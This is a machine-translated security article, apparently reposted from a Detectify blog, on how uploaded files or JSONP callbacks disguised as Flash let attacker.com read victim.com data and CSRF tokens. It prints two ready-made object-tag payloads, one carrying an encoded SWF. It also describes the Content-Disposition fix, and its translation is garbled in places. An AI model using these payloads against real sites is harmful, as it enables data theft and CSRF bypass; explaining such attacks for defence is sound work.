File Upload traps

Source: Internet
Author: User

0x00 background

Many websites now allow users to upload files, but they are not aware of the trap of allowing users (or attackers) to upload files (or even legitimate files.

What is a legal file?

Generally, determining whether a File is legal involves two parameters: File extension and Content-Type.

For example, the website will ensure that the suffix is jpg and the Content-Type is image/jpeg to prevent malicious files, right?

However, some Flash plug-ins do not care about the suffix and Content-type. If a file is embedded with tags, It will be executed like Flash, as long as its content is like a Flash file.

 

However, should Flash be executed only when embedded in the same domain? Yes or wrong. If a Flash file (or an image-encapsulated Flash file) is uploaded to victim.com and embedded under attacker.com, it can only execute JavaScript under attacker.com. However, if the Flash file sends a request, it can read files under victim.com.

This indicates that, without checking the file content, attackers can bypass the website's CSRF defense.

0x01 attacks

Based on the above, we can imagine an attack scenario:

1. attackers can create a malicious Flash (SWF) file. attackers can change the file sub-file name to JPG 3. attackers upload files to victim.com 4. the attacker embeds the file in attacker.com as a tag and application/x-shockwave-flash. the victim browses attacker.com and loads the file in SWF format. 6. attackers can now send and receive arbitrary requests to victim.com using the SWF and the victim's session. attackers send a request to victim.com to obtain the victim's CSRF token.

Payload will be like this

<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>   
0x02 Patching

The good news is that there is a relatively simple way to prevent the Flash behavior. If Flash sees the file and returns the following Content-Disposition header, it will not execute:

Content-Disposition: attachment; filename="image.jpg"  

Therefore, if you are allowed to upload or output any data, the website should always check whether the content is valid and return as much data as possible.Content-Disposition header.

0x03 Other Purposes

In fact, this attack is not limited to file upload. This attack only requires attackers to control the data under the domain name (regardless of Content-Type). Therefore, there are other methods to carry out the attack.

One of them is to use the JSONP interface. Generally, attackers can control the output of the JSONP interface by changing the callback parameter. However, attackers can use the content of the entire Flash file as the callback parameter to achieve the same attack as uploading files. Payload will look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object>

From: http://blog.detectify.com/post/86298380233/the-pitfalls-of-allowing-file-uploads-on-your-website

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.